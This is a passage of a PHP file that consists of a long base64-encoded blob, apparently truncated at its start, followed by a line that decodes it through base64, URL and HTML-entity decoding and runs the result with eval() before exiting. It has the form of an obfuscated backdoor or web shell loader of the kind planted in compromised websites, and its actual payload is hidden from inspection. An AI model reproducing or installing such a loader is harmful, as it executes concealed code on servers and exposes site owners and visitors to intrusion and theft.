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";
eval(htmlspecialchars_decode(urldecode(base64_decode($gz))));
exit;
?>